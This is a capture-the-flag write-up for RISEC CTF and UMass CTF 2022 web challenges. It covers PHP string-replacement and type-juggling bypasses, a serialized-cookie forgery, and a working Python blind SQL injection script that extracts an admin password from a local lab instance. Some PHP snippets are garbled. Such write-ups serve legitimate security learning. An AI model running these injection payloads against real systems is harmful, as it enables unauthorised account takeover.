# RISEC CTF + UMass CTF 2022 `Web Challenge` ## RISEC CTF ### Pretty Horrible Program 1 ``` Your string is: $clean_string

"; if ($clean_string == $to_replace) { echo "

Bingus IS your beloved

"; output_flag(); } else { echo "

Bingus IS NOT your beloved

"; } } ?> ``` * Notice that $clean\_string genererated by replacing * So that we just input something that after replacing. it's equal to 'bingus' demo: ![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FRfdeY9z1BkvUBz3ZqP2a%2Fimage.png?alt=media\&token=fc04b145-2786-4785-a82d-c49870094a17) ![](https://2201636059-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FSfoQhbocJNOvMrmTVxh9%2Fuploads%2FYF73fbIZoJzXi42vNmJR%2Fimage.png?alt=media\&token=e20dd2aa-18db-4445-8caa-63b26badefd6) ### Pretty Horrible Program 2 ``` class User { public $role = 'Admin'; } $default_user = new User; $_COOKIE = serialize($default_user); setcookie( 'user', serialize($default_user) ); $a=unserialize($_COOKIE); echo "$_COOKIE" ``` ### Pretty Horrible Program 3 ``` Nice try, but it won\'t be that easy ;)'; } else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) { output_flag(); } else { print '

Your inputs don\'t match

'; } } ?>

See if you can make the sha256 hashes match


Source Code

Hash:

Hash:

this one ](https://crypto.stackexchange.com/questions/47809/why-havent-any-sha-256-collisions-been-found-yet), it takes about ≈3.6×1013 years to find, so that it's not a practical option. * After that i focused on '==' in php. Searching around and i got [this ](https://www.invicti.com/blog/web-security/php-type-juggling-vulnerabilities/)and [this](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) * Now you just put \[] in input and get flag. ## UMass CTF ## venting This challenge ended and the website was turned off. So i build it in docker from [here](https://github.com/UMassCybersecurity/UMassCTF-2022-challenges) * when you connectn try to see history in burpsuite, you can get the link redirect to the login page * Now read the hint with 'admin' in user and password does't have fillter so that mean that may be SQLI. Exactly. that's is blind SQLI * I solve this challenge by burpsuite as same as [this lab](https://portswigger.net/web-security/sql-injection/blind) otherway, try to bruteforce by python request: ``` import requests, string url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login" s = requests.session() passwordRetrieve = "" # ' or (select 'a' from users where username='admin' and length(Password)>36)='a def solve(): global passwordRetrieve index = 0 while True: for char in string.printable: usernamefield = "\\" passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a" postParam = {'user': usernamefield, 'pass': passwordfield} response = s.post(url, data=postParam).text if "Invalid" not in response: passwordRetrieve += char index += 1 print(passwordRetrieve) break if (index == 37): break SELECT * from users WHERE username='admin\' AND Password = ''or 'True' solve() ``` Thanks for reading. Have a good day :heart: ! Contact: * [facebook ](https://www.facebook.com/rong.truong.372)